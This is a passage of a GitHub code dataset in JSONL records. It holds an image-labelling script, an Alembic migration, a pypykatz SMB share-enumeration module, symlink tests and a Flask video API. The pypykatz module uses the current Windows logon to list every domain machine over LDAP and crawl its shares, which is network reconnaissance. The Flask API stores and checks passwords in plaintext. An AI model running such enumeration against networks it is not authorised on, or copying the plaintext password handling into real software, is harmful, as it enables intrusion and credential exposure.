"usage_type": "call"}, {"api_name": "vsf_user.front.views.DeleteAPIUsers", "line_number": 17, "usage_type": "attribute"}, {"api_name": "vsf_user.front.views", "line_number": 17, "usage_type": "name"}]}
+{"seq_id": "10461658798", "text": "from PIL import ImageFont, ImageDraw, Image\nimport argparse\n# https://blog.gtwang.org/programming/opencv-drawing-functions-tutorial/\n\ndef paste(name, output):\n image = Image.open(\"./base.png\")\n drawer = ImageDraw.Draw(image)\n name_len = len(name)\n if name_len == 4:\n font = ImageFont.truetype(\"./標楷體.ttf\", 68)\n drawer.text((922, 853), name, font=font, fill=(0, 0, 0))\n elif name_len == 5:\n font = ImageFont.truetype(\"./標楷體.ttf\", 55)\n drawer.text((918, 858), name, font=font, fill=(0, 0, 0))\n elif name_len == 6:\n font = ImageFont.truetype(\"./標楷體.ttf\", 50)\n drawer.text((912, 862), name, font=font, fill=(0, 0, 0))\n else:\n raise NotImplementedError\n image.save(output)\n\ndef main(args):\n name = args.name + \"同學\" if args.student else args.name\n paste(name, args.output)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"name\", type=str)\n parser.add_argument(\"output\", type=str)\n parser.add_argument(\"--student\", action=\"store_true\", default=False)\n args = parser.parse_args()\n \n main(args)\n", "repo_name": "jimlinntu/gbc-paste", "sub_path": "paste.py", "file_name": "paste.py", "file_ext": "py", "file_size_in_byte": 1145, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 6, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 6, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 13, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 13, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 16, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 16, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "4585676599", "text": "\"\"\"empty message\n\nRevision ID: 4744a3a56f55\nRevises: 97fd285963c7\nCreate Date: 2020-01-18 20:10:06.316710\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '4744a3a56f55'\ndown_revision = '97fd285963c7'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('person', sa.Column('address', sa.String(length=200), nullable=False))\n op.add_column('person', sa.Column('phone', sa.String(length=20), nullable=False))\n op.create_unique_constraint(None, 'person', ['address'])\n op.create_unique_constraint(None, 'person', ['phone'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'person', type_='unique')\n op.drop_constraint(None, 'person', type_='unique')\n op.drop_column('person', 'phone')\n op.drop_column('person', 'address')\n # ### end Alembic commands ###\n", "repo_name": "Rhpozzo/FlaskAPI", "sub_path": "migrations/versions/4744a3a56f55_.py", "file_name": "4744a3a56f55_.py", "file_ext": "py", "file_size_in_byte": 1018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "alembic.op.add_column", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 21, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op.add_column", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.create_unique_constraint", "line_number": 24, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 24, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 32, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 32, "usage_type": "name"}, {"api_name": "alembic.op.drop_column", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "20124023132", "text": "from msldap.commons.factory import LDAPConnectionFactory\nfrom aiosmb.examples.smbshareenum import SMBFileEnum, ListTargetGen, FileTargetGen\n\ndef get_smb_url(authmethod = 'ntlm', protocol_version = '2', host = None):\n\tfrom winacl.functions.highlevel import get_logon_info\n\tinfo = get_logon_info()\n\tlogonserver = info['logonserver']\n\tif host is not None:\n\t\tlogonserver = host\n\n\treturn 'smb%s+sspi-%s://%s\\\\%s@%s' % (protocol_version, authmethod, info['domain'], info['username'], logonserver)\n\n\ndef get_ldap_url(authmethod = 'ntlm', host = None):\n\tfrom winacl.functions.highlevel import get_logon_info\n\tinfo = get_logon_info()\n\n\tlogonserver = info['logonserver']\n\tif host is not None:\n\t\tlogonserver = host\n\n\treturn 'ldap+sspi-%s://%s\\\\%s@%s' % (authmethod, info['domain'], info['username'], logonserver)\n\nclass LDAPTargetGen:\n\tdef __init__(self, url):\n\t\tself.url = url\n\t\n\tasync def generate(self):\n\t\ttry:\n\t\t\tconn_url = LDAPConnectionFactory.from_url(self.url)\n\t\t\tconnection = conn_url.get_client()\n\t\t\t_, err = await connection.connect()\n\t\t\tif err is not None:\n\t\t\t\traise err\n\t\t\t\n\t\t\tadinfo = connection._ldapinfo\n\t\t\tdomain_name = adinfo.distinguishedName.replace('DC','').replace('=','').replace(',','.')\n\n\t\t\tasync for machine, err in connection.get_all_machines(attrs=['sAMAccountName', 'dNSHostName', 'objectSid']):\n\t\t\t\tif err is not None:\n\t\t\t\t\traise err\n\t\t\t\t\t\n\t\t\t\tdns = machine.dNSHostName\n\t\t\t\tif dns is None:\n\t\t\t\t\tdns = '%s.%s' % (machine.sAMAccountName[:-1], domain_name)\n\t\t\t\t\n\t\t\t\tyield str(machine.objectSid), str(dns), None\n\n\t\texcept Exception as e:\n\t\t\tyield None, None, e\n\t\n\nasync def shareenum(smb_url, ldap_url = None, targets = None, smb_worker_count = 10, depth = 3, out_file = None, progress = False, max_items = None, dirsd = False, filesd = False, authmethod = 'ntlm', protocol_version = '2', output_type = 'str', max_runtime = None, exclude_share = ['print$'], exclude_dir = [], exclude_target = []):\n\n\tif smb_url == 'auto':\n\t\tsmb_url = get_smb_url(authmethod=authmethod, protocol_version=protocol_version)\n\t\n\tenumerator = SMBFileEnum(\n\t\tsmb_url,\n\t\tworker_count = smb_worker_count, \n\t\tdepth = depth, \n\t\tout_file = out_file, \n\t\tshow_pbar = progress,\n\t\tmax_items = max_items,\n\t\tfetch_dir_sd = dirsd,\n\t\tfetch_file_sd = filesd,\n\t\toutput_type = output_type,\n\t\tmax_runtime = max_runtime,\n\t\texclude_share = exclude_share,\n\t\texclude_dir = exclude_dir,\n\t\texclude_target = exclude_target\n\t)\n\t\n\tnotfile = []\n\tif targets is not None:\n\t\tfor target in targets:\n\t\t\ttry:\n\t\t\t\tf = open(target, 'r')\n\t\t\t\tf.close()\n\t\t\t\tenumerator.target_gens.append(FileTargetGen(target))\n\t\t\texcept:\n\t\t\t\tnotfile.append(target)\n\t\t\n\t\tif len(notfile) > 0:\n\t\t\tenumerator.target_gens.append(ListTargetGen(notfile))\n\t\n\tif ldap_url is not None:\n\t\tif ldap_url == 'auto':\n\t\t\tldap_url = get_ldap_url(authmethod=authmethod)\n\t\tenumerator.target_gens.append(LDAPTargetGen(ldap_url))\n\n\tif len(enumerator.target_gens) == 0:\n\t\tenumerator.enum_url = True\n\t\t#raise Exception('No suitable targets found!')\n\n\tawait enumerator.run()\n", "repo_name": "skelsec/pypykatz", "sub_path": "pypykatz/smb/shareenum.py", "file_name": "shareenum.py", "file_ext": "py", "file_size_in_byte": 2987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2505, "dataset": "github-code", "pt": "53", "api": [{"api_name": "winacl.functions.highlevel.get_logon_info", "line_number": 6, "usage_type": "call"}, {"api_name": "winacl.functions.highlevel.get_logon_info", "line_number": 16, "usage_type": "call"}, {"api_name": "msldap.commons.factory.LDAPConnectionFactory.from_url", "line_number": 30, "usage_type": "call"}, {"api_name": "msldap.commons.factory.LDAPConnectionFactory", "line_number": 30, "usage_type": "name"}, {"api_name": "aiosmb.examples.smbshareenum.SMBFileEnum", "line_number": 58, "usage_type": "call"}, {"api_name": "aiosmb.examples.smbshareenum.FileTargetGen", "line_number": 80, "usage_type": "call"}, {"api_name": "aiosmb.examples.smbshareenum.ListTargetGen", "line_number": 85, "usage_type": "call"}]}
+{"seq_id": "34256755892", "text": "#!/usr/bin/env python\n\"\"\"Tests for `dlink` package.\"\"\"\nimport os\nfrom argparse import Namespace\nfrom pathlib import Path\n\nimport pytest\n\nfrom dlink import core\n\n\n@pytest.fixture\ndef populate(tmp_path):\n # At the risk of this not being super clear.\n # 1. Make a directory and a bunch of files.\n base = tmp_path / \"base\"\n base.mkdir()\n for i in range(5):\n # This is kinda sloppy because / makes a new directory and I'm genuinely\n # unsure of what the clean way to concatenate strings and Paths together\n (base / (str(i) + \".txt\")).write_text(\"Foo\")\n\n return base\n\n\n@pytest.fixture\ndef args(tmp_path, populate):\n namespace = Namespace()\n namespace.destination = populate\n namespace.log = True\n namespace.log_level = 10\n namespace.recursive = False\n namespace.glob_pattern = \"\"\n namespace.source = tmp_path / \"src\"\n namespace.source.mkdir()\n return namespace\n\n\ndef test_symlink(tmp_path):\n d = tmp_path\n d.mkdir(exist_ok=True)\n dest = d / \"any_file.txt\"\n dest.write_text(\"Probably not necessary\")\n # Start with a path object. Then parameterize this?\n src = tmp_path / \"link\"\n core.symlink(src, dest)\n assert Path.is_symlink(src)\n assert Path.is_file(dest)\n\n\ndef test_generate_dest(populate):\n ret = core.generate_dest(populate)\n for i in range(5):\n file = populate / (str(i) + \".txt\")\n assert file == ret[i]\n\n\ndef test_main(args):\n os.chdir(args.source)\n core.main(args)\n assert \"0.txt\" in os.listdir()\n\n\ndef test_logging(args, caplog):\n os.chdir(args.source)\n core.main(args)\n for record in caplog.records:\n assert record.levelname != \"ERROR\"\n\n\nif __name__ == \"__main__\":\n pytest.main()\n", "repo_name": "farisachugthai/dlink", "sub_path": "tests/test_dlink.py", "file_name": "test_dlink.py", "file_ext": "py", "file_size_in_byte": 1725, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pytest.fixture", "line_number": 12, "usage_type": "attribute"}, {"api_name": "argparse.Namespace", "line_number": 28, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 26, "usage_type": "attribute"}, {"api_name": "dlink.core.symlink", "line_number": 46, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 46, "usage_type": "name"}, {"api_name": "pathlib.Path.is_symlink", "line_number": 47, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 47, "usage_type": "name"}, {"api_name": "pathlib.Path.is_file", "line_number": 48, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 48, "usage_type": "name"}, {"api_name": "dlink.core.generate_dest", "line_number": 52, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 52, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 59, "usage_type": "call"}, {"api_name": "dlink.core.main", "line_number": 60, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 60, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 61, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 65, "usage_type": "call"}, {"api_name": "dlink.core.main", "line_number": 66, "usage_type": "call"}, {"api_name": "dlink.core", "line_number": 66, "usage_type": "name"}, {"api_name": "pytest.main", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "13020101618", "text": "from flask import Flask, make_response, request\nimport os\nfrom crud import Crud\nfrom routes_helper import RoutesHelper\nfrom flask_cors import CORS\n\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/api/*\": {\"origins\": \"http://127.0.0.1:5000\"}})\n\n@app.route('/api/register', methods=['POST'])\ndef register():\n user_table = Crud('user')\n users = user_table.get_all_elements()\n json = request.json\n user_in_bd = False\n\n if all(key in json.keys() for key in ['email', 'pw', 'name']):\n for user in users:\n if(user['email'] == json['email']):\n user_in_bd = True\n if(not user_in_bd):\n cols, values = RoutesHelper.insert_element('user', json.items())\n user_holder = user_table.getElements_and_operator(cols, values)\n user_row = user_holder[0]\n user_id = user_row['id']\n return make_response({\n 'message': 'Utilizador criado com sucesso.',\n 'user_id': user_id\n }),201\n else:\n return make_response({\"error\": \"Já existe uma conta com este email.\"}), 409\n else:\n message = 'Missing required fields'\n return make_response({'error': message}), 400\n\n\n@app.route('/api/login', methods=['POST'])\ndef login():\n email = request.json.get('email')\n password = request.json.get('pw')\n\n users_table = Crud('user')\n users = users_table.getElements_and_operator(['email', 'pw'], [email, password])\n if(users):\n for user in users:\n if(user['email'] == email and user['pw'] == password):\n message = {\"message\": \"Log in com sucesso.\", 'user_id': user['id']}\n return make_response(message), 200\n message = {'error': 'Email ou Password invalidos. '}\n return make_response(message), 401\n\n@app.route('/api/google/login', methods=['POST'])\ndef login_google():\n req = request.json\n\n name = req.get('name')\n email = req.get('email')\n password = req.get('pw')\n\n if not (name and email and password):\n return make_response({'error':'Está em falta name ou email ou uid no body do request.'})\n\n users_table = Crud('user')\n users = users_table.getElements_and_operator(['email', 'pw'], [email, password])\n\n if(users):\n for user in users:\n if(user['email'] == email and user['pw'] == password):\n message = {\"message\": \"Log in com sucesso.\", 'user_id': user['id']}\n return make_response(message), 200\n \n user_table = Crud('user')\n cols, values = RoutesHelper.insert_element('user', req.items())\n user_holder = user_table.getElements_and_operator(cols, values)\n user_row = user_holder[0]\n user_id = user_row['id']\n return make_response({\n 'message': 'Utilizador criado com sucesso.',\n 'user_id': user_id\n }),201\n\n\n@app.route('/api/user/', methods=['GET'])\ndef get_user(id_user):\n\n user_handler = Crud('user')\n user = user_handler.get_element_by_pk(id_user, 'id')\n\n if user:\n return make_response(user)\n \n return make_response({'error':'Este utilizador não existe.'})\n\n@app.route('/api/videos/', methods=['GET'])\ndef get_video_details(id):\n video_handler = Crud('video')\n video_details = video_handler.get_element_by_pk(id,'id')\n\n if video_details:\n likes_handler = Crud('likes_video')\n like_count = likes_handler.count('id_video', video_details['id']) \n dislikes_handler = Crud('dislikes_video')\n dislikes_count = dislikes_handler.count('id_video', video_details['id'])\n video_details.update({'likes': like_count, 'dislikes': dislikes_count})\n return make_response(video_details), 200\n \n return make_response({'error':'Video nao encontrado.'}), 404\n\n@app.route('/api/videos/view/', methods=['POST'])\ndef increment_view(id_video):\n video_handler = Crud('video')\n \n video_details = video_handler.get_element_by_pk(id_video,'id')\n if video_details:\n video_handler.update_element(id_video,['views'], [video_details['views'] + 1], 'id')\n new_video_details = video_handler.get_element_by_pk(id_video,'id')\n \n if new_video_details:\n likes_handler = Crud('likes_video')\n like_count = likes_handler.count('id_video', new_video_details['id']) \n dislikes_handler = Crud('dislikes_video')\n dislikes_count = dislikes_handler.count('id_video', new_video_details['id'])\n new_video_details.update({'likes': like_count, 'dislikes': dislikes_count})\n \n return make_response(new_video_details), 200\n \n return make_response({'error':'Este video não existe.'})\n\n\n@app.route('/api/videos/like', methods=['POST'])\ndef add_like():\n\n id_user = request.json.get('id_user')\n id_video = request.json.get('id_video')\n \n likes_handler = Crud('likes_video')\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n\n row_likes = likes_handler.get_elements_by_string_field('id_video', id_video)\n \n if id_user in [bd_user_id['id_user'] for bd_user_id in row_likes]:\n return make_response({'message': f'O utilizador {id_user} já deu like neste vídeo.'}), 400\n else:\n likes_handler.insert(['id_user', 'id_video'], [id_user, id_video])\n return make_response({\n 'id_user':id_user,\n 'id_video':id_video,\n 'message': f'O utilizador {id_user} deu like no vídeo de ID {id_video}.'\n }) \n\n\n@app.route('/api/videos/dislike', methods=['POST'])\ndef add_dislike():\n\n id_user = request.json.get('id_user')\n id_video = request.json.get('id_video')\n \n dislikes_handler = Crud('dislikes_video')\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n\n row_likes = dislikes_handler.get_elements_by_string_field('id_video', id_video)\n \n if id_user in [bd_user_id['id_user'] for bd_user_id in row_likes]:\n return make_response({'message': f'O utilizador {id_user} já deu dislike neste vídeo.'}), 400\n else:\n dislikes_handler.insert(['id_user', 'id_video'], [id_user, id_video])\n return make_response({\n 'id_user':id_user,\n 'id_video':id_video,\n 'message': f'O utilizador {id_user} deu dislike no vídeo de ID {id_video}.'\n }) \n\n@app.route('/api/videos//comments', methods=['GET'])\ndef get_comments(id_video):\n \n comments_handler = Crud('comments_video')\n comments_video = comments_handler.get_elements_by_string_field('id_video', id_video)\n user_handler = Crud('user')\n\n if id_video not in [row['id_video'] for row in comments_video]:\n return make_response({'message': f'O vídeo de ID {id_video} não possui comentários.'}), 404\n\n for row in comments_video:\n user = user_handler.get_element_by_pk(row['id_user'], 'id')\n row.update({'name':user['name']})\n\n return make_response(comments_video)\n\n@app.route('/api/videos//comments', methods=['POST'])\ndef add_comment(id_video):\n \n id_user = request.json.get('id_user')\n comment_desc = request.json.get('comment')\n\n user_handler = Crud('user')\n video_handler = Crud('video')\n\n valid_user = user_handler.get_element_by_pk(id_user, 'id')\n valid_video = video_handler.get_element_by_pk(id_video, 'id')\n\n if not valid_user:\n return make_response({'message': f'O utilizador {id_user} não existe.'}), 400\n\n if not valid_video:\n return make_response({'message': f'O video {id_video} não existe.'}), 400\n \n comment_handler = Crud('comments_video')\n comment_handler.insert(['id_user', 'id_video', 'descr'], [id_user, id_video, comment_desc])\n \n return make_response({'message': 'Comentário adicionado com sucesso.'})\n\n@app.route('/api/videos/comments/', methods=['DELETE'])\ndef delete_comment(comment_id):\n comments_handler = Crud('comments_video')\n comment = comments_handler.get_element_by_pk(comment_id, 'id')\n \n if comment:\n comments_handler.delete_element(comment_id, 'id')\n return make_response({'message': f'Comentário de ID {comment_id} foi excluído com sucesso.'}), 200\n \n return make_response({'message': f'O comentário de ID {comment_id} não foi encontrado.'}), 404\n \n@app.route('/api/playlists', methods=['POST'])\ndef create_playlist():\n \n playlist_name = request.json.get('name')\n id_user = request.json.get('id_user')\n \n if playlist_name and id_user:\n user_list_handler = Crud('user_list')\n user_list_handler.insert(['id_user', 'name'],[id_user, playlist_name])\n else:\n return make_response({'message': 'O id do utilizador e o nome da playlist são obrigatórios.'}), 403\n\n\n return make_response({'message': 'Playlist criada com sucesso.'}), 201\n\n@app.route('/api/playlists', methods=['DELETE'])\ndef delete_playlist():\n req = request.json\n list_id = req.get('id')\n if list_id:\n list_handler = Crud('user_list')\n video_handler = Crud('video_list')\n video_handler.delete_element(list_id, 'id_user_list')\n list_handler.delete_element(list_id, 'id')\n return make_response({'message':'Playlist removida com sucesso.'})\n else:\n return make_response({'error':'Id da playlist em falta.'}), 404\n\n@app.route('/api/playlists/videos', methods=['POST'])\ndef add_video_to_playlist():\n \n req = request.json\n id_user_list = req.get('id_user_list')\n id_video = req.get('id_video')\n \n video_handler = Crud('video')\n video_in_db = video_handler.get_element_by_pk(id_video, 'id')\n\n user_list_handler = Crud('user_list')\n user_list_in_db = user_list_handler.get_element_by_pk(id_user_list, 'id')\n\n if not video_in_db:\n return make_response({'error': 'Este video não existe.'})\n \n if not user_list_in_db:\n return make_response({'error': 'Esta playlist não existe.'})\n\n if id_video and id_user_list:\n cols = []\n values = []\n\n for col, value in req.items():\n cols.append(col)\n values.append(value)\n\n handler = Crud('video_list')\n in_db = handler.getElements_and_operator(cols, values)\n if not in_db:\n handler.insert(cols, values)\n return make_response({'message':'Video inserido à playlist com sucesso.'}), 200\n else:\n return make_response({'message':'Este video já existe na playlist.'}), 200\n \n else:\n return make_response({'error': 'Id da playlist ou id do utilizador em falta.'}), 404\n\n@app.route('/api/playlists/videos', methods=['DELETE'])\ndef del_video_from_playlist():\n \n req = request.json\n id_user_list = req.get('id_user_list')\n id_video = req.get('id_video')\n\n if id_video and id_user_list:\n cols = []\n values = []\n\n for col, value in req.items():\n cols.append(col)\n values.append(value)\n\n handler = Crud('video_list')\n in_db = handler.getElements_and_operator(cols, values)\n if not in_db:\n return make_response({'error':'Este video não existe na playlist.'}), 200\n else:\n handler.delete_element(in_db[0]['id'], 'id')\n return make_response({'message':'O video foi removido com sucesso.'}), 200\n \n else:\n return make_response({'error': 'Id da playlist ou id do utilizador em falta.'}), 404\n\n@app.route('/api/playlists/', methods=['GET'])\ndef get_playlist(id_user):\n\n playlist_handler = Crud('user_list')\n playlists = playlist_handler.get_elements_by_string_field('id_user', id_user)\n \n if playlists:\n return make_response(playlists)\n \n return make_response({'message': 'Este utilizador não tem playlists.'})\n\n\n@app.route('/api/playlists/videos/', methods=['GET'])\ndef get_videos_from_playlist(id_playlist):\n\n playlist_handler = Crud('video_list')\n videos = playlist_handler.get_elements_by_string_field('id_user_list', id_playlist)\n \n if videos:\n return make_response(videos)\n \n return make_response({'message': 'Esta playlist não existe ou está vazia.'})\n \n@app.route('/api/videos/top/', methods=['GET'])\ndef get_top_vieos(n_top):\n handler = Crud('video')\n result = handler.get_top(n_top, 'views')\n \n if result:\n return make_response(result)\n \n return make_response({'error':'Ups alguma coisa correu mal.'})\n\n@app.route('/api/videos/youtube/', methods=['GET'])\ndef get_video_id_from_id_platform(id_platform):\n handler = Crud('video')\n\n y_video = handler.get_elements_by_string_field('id_platform', id_platform)\n\n if y_video:\n return make_response(y_video[0]), 200\n \n handler.insert(['id_platform', 'platform', 'views'], [id_platform, 'youtube', 0])\n y_video = handler.get_elements_by_string_field('id_platform', id_platform)\n \n if y_video:\n return make_response(y_video[0]), 200\n \n return make_response({'error':'Ups algo correu mal.'}), 400\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=os.getenv(\"PORT\", default=5000))\n", "repo_name": "ThunderShake/sd_api", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 13896, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 9, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 15, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 15, "usage_type": "name"}, {"api_name": "routes_helper.RoutesHelper.insert_element", "line_number": 23, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 40, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 51, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 55, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 62, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 64, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 71, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 73, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper.insert_element", "line_number": 74, "usage_type": "call"}, {"api_name": "routes_helper.RoutesHelper", "line_number": 74, "usage_type": "name"}, {"api_name": "flask.make_response", "line_number": 78, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 87, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 91, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 93, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 97, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 101, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 103, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 106, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 108, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 112, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 120, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 122, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 126, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 128, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 134, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 134, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 134, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 135, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 135, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 135, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 137, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 138, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 139, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 145, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 148, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 166, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 166, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 166, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 167, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 167, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 167, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 169, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 170, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 171, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 177, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 185, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 188, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 197, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 199, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 202, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 208, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 213, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 213, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 213, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 214, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 214, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 214, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 216, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 217, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 223, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 226, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 228, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 231, "usage_type": "call"}, {"api_name": "crud.Crud", "line_number": 235, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 240, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 242, "usage_type": "call"}, {"api_name": "flask.request.json.get", "line_number": 247, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 247, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 247, "usage_type": "name"}, {"api_name": "flask.request.json.get", "line_number": 248, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 248, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 248, "usage_type": "name"}, {"api_name": "crud.Crud", "line_number": 251, "usage_type": "call"}, {"api_name": "flask.make_response", "line_number": 254, "usage_type": "call"}, {"api_name": 